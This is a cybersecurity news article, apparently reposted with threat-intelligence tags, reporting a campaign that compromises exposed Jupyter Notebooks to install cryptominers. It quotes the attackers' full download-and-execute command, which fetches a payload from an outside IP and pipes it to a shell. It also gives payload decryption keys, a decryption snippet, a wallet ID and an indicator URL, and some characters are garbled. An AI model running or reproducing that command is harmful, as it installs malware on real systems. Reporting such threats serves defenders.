A novel cryptomining campaign has been identified that exploits misconfigured Jupyter Notebooks, targeting both Windows and Linux systems.The attack leverages exposed instances of Jupyter Notebook, an interactive application widely used by data scientists containing a Python IDE, to deploy malicious code that installs cryptomining software on compromised systems.The campaign begins by exploiting unsecured Jupyter environments to execute a command that attempts to install malware through multiple methods.The initial payload attempts to download either an MSI file for Windows systems or a JavaScript file for Linux environments using the command: ‘(ipconfig -&-& msiexec /i http://45.130.22.219/py0217.msi) -|-| (wget -q -O- http://45.130.22.219/py0217.js-|sh)’Analysts at Cado Security Labs [identified](https://www.cadosecurity.com/blog/jupyter-notebooks-cryptominer) this attack through their honeypot systems, noting that the campaign represents a new vector for cryptomining attacks that hasn’t been previously reported, despite sharing similarities with earlier campaigns targeting Ivanti Connect Secure and Korean web servers.When targeting Windows systems, the attack downloads an MSI installer containing a 64-bit Windows executable named ‘Binary.freedllbinary.’This binary loads a secondary payload called ‘java.exe’ which is stored in c:–ProgramData. Despite its name, ‘java.exe’ is actually a malicious binary packed with UPX that retrieves an encrypted blob called ‘x2.dat’ from various repositories including Github, Launchpad, and Gitee.**Attack Chain**—————-The attackers employ sophisticated [encryption](https://cybersecuritynews.com/windows-11-bitlocker-encryption-bypassed/) techniques to hide their payloads.The ‘x2.dat’ file is encrypted with ChaCha20 using the nonce ‘aQFabieiNxCjk6ygb1X61HpjGfSKq4zH’ and the key ‘AZIzJi2WxU0G’ before being compressed with zlib.The code to decrypt this payload is as follows:- from Crypto.Cipher import ChaCha20 import zlib key = b’ ‘ nonce = b’ ‘ with open(”, ‘rb’) as f: ciphertext = f.read() cipher = ChaCha20.new(key=key, nonce=nonce) plaintext = cipher. Decrypt(ciphertext) # Decompress with zlib after decryption decompressed_data = zlib.decompress(plaintext)For Linux systems, the attack downloads a bash script ‘0217.js’ that retrieves two ELF binaries and sets up cronjobs to ensure persistence. .webp) Mining pool (Source — CRADO Security)The malware targets [cryptocurrencies](https://cybersecuritynews.com/how-cryptocurrencies-are-combatting-cyber-breaches/) including Monero, Sumokoin, ArQma, and several others, using wallet ID ’44Q4cH4jHoAZgyHiYBTU9D7rLsdV82y4EvPRkjgdMQThPLJVB3ZbD9Sc1i84Q9eHYgb9Ze7A3syWV’.Organizations should implement strong authentication, disable public access to Jupyter instances, and regularly monitor cloud environments for unusual activity to [mitigate](https://cybersecuritynews.com/ways-to-mitigate-phishing-attacks-a-detailed-guide/) these attacks.******Are you from SOC/DFIR Teams? — Analyse Malware Incidents & get live Access with ANY.RUN -> [Start Now for Free](https://any.run/demo?utm_source=csn&utm_medium=article&utm_campaign=ti_feeds&utm_content=demo&utm_term=110325).******The post [Hackers Attacking Exposed Jupyter Notebooks To Deliver Cryptominer](https://cybersecuritynews.com/hackers-attacking-exposed-jupyter-notebooks/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
Related Tags:
NAICS: 335 – Electrical Equipment
Appliance
Component Manufacturing
NAICS: 519 – Web Search Portals
Libraries
Archives
Other Information Services
NAICS: 541 – Professional
Scientific
Technical Services
NAICS: 52 – Finance And Insurance
NAICS: 33 – Manufacturing – Metal
Electronics And Other
NAICS: 523 – Securities
Commodity Contracts
Other Financial Investments And Related Activities
NAICS: 51 – Information
ipconfig
ZLib
Associated Indicators:
http://45.130.22.219/py0217.js